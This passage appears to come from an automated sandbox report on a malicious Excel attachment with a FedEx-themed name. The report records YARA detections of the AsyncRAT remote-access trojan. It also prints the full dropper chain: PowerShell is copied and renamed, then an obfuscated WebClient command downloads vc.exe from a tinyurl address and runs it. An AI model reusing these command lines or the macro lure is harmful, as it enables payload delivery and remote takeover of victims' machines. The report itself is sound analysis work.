      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://login.windows.local
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://management.azure.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://management.azure.com/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://messaging.office.com/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officeapps.live.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: o.exe, 0000000E.00000002.397281836.00000000055A8000.00000004.00000001.sdmp, o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://settings.outlook.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://tasks.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com/y3m5fwhq
      Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com4
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected AsyncRATShow sources
      Source: Yara matchFile source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
      Source: Document image extraction number: 0Screenshot OCR: Enable Content"
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
      Source: Document image extraction number: 1Screenshot OCR: Enable Content"
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 1099008FEDEX_090887766.xlsInitial sample: EXEC
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_01258D9014_2_01258D90
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_01258C9014_2_01258C90
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125773214_2_01257732
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_012590D014_2_012590D0
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0337E83014_2_0337E830
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 17_2_00EBCE6017_2_00EBCE60
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_02ACE4A032_2_02ACE4A0
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_02ACE4B032_2_02ACE4B0
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_02ACC53C32_2_02ACC53C
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_07232E6132_2_07232E61
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_07232E7032_2_07232E70
      Source: 1099008FEDEX_090887766.xlsOLE indicator, VBA macros: true
      Source: C:\Windows\SysWOW64\Robocopy.exeProcess token adjusted: SecurityJump to behavior
      Source: powershell.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: powershell.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: powershell.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: powershell.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\AppData\Roaming\vc.exeSection loaded: amsidll.dll
      Source: 1099008FEDEX_090887766.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: vc.exe.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vc.exe.14.dr, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: vc.exe.14.dr, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: vc.exe.14.dr, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.csCryptographic APIs: 'TransformFinalBlock'
      Source: classification engineClassification label: mal96.troj.expl.evad.winXLS@31/25@2/2
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_012590D0 FormatMessageW,LocalFree,GetLastError,FormatMessageW,free,LocalFree,free,free,14_2_012590D0
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125C231 __EH_prolog3_GS,CoInitialize,CoCreateInstance,CoUninitialize,14_2_0125C231
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125D547 FindResourceExW,LoadResource,14_2_0125D547
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FE3D55F8-EE7F-4F13-A134-D11201796DC7} - OProcSessId.datJump to behavior
      Source: 1099008FEDEX_090887766.xlsOLE indicator, Workbook stream: true
      Source: C:\Users\user\AppData\Local\Temp\o.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Roaming\vc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 1099008FEDEX_090887766.xlsReversingLabs: Detection: 14%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exitJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exitJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
      Source: C:\Users\user\AppData\Local\Temp\o.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\o.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: Binary string: powershell.pdbUGP source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr
      Source: Binary string: powershell.pdb source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr

      Data Obfuscation:

      barindex
      Binary contains a suspicious time stampShow sources
      Source: initial sampleStatic PE information: 0x9203324E [Sat Aug 17 19:30:22 2047 UTC]
      Obfuscated command line foundShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125A58B push ecx; ret 14_2_0125A59E
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125A239 push ecx; ret 14_2_0125A24C
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0337BE60 push es; ret 14_2_0337BE76
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0337BEA0 push es; ret 14_2_0337BEB6
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0337BE80 push es; ret 14_2_0337BE96
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0337BEC2 push es; ret 14_2_0337BED6
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 17_2_00EBC5E0 push es; ret 17_2_00EBC5F0
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 17_2_00EBD9E0 push es; ret 17_2_00EBD9F0
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_007A07D8 push es; ret 32_2_007A0C96
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_072375E8 push E803B477h; iretd 32_2_072375ED
      Source: C:\Users\user\AppData\Roaming\vc.exeCode function: 32_2_07237A05 push eax; ret 32_2_07237A06
      Source: initial sampleStatic PE information: section name: .text entropy: 7.71178527327

      Persistence and Installation Behavior:

      barindex
      Drops PE files to the document folder of the userShow sources
      Source: C:\Users\user\AppData\Local\Temp\o.exeFile created: C:\Users\user\Documents\vc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\o.exeFile created: C:\Users\user\Documents\vc.exeJump to dropped file
      Source: C:\Windows\SysWOW64\Robocopy.exeFile created: C:\Users\user\AppData\Local\Temp\powershell.exeJump to dropped file

      Boot Survival:

      barindex
      Yara detected AsyncRATShow sources
      Source: Yara matchFile source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\o.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
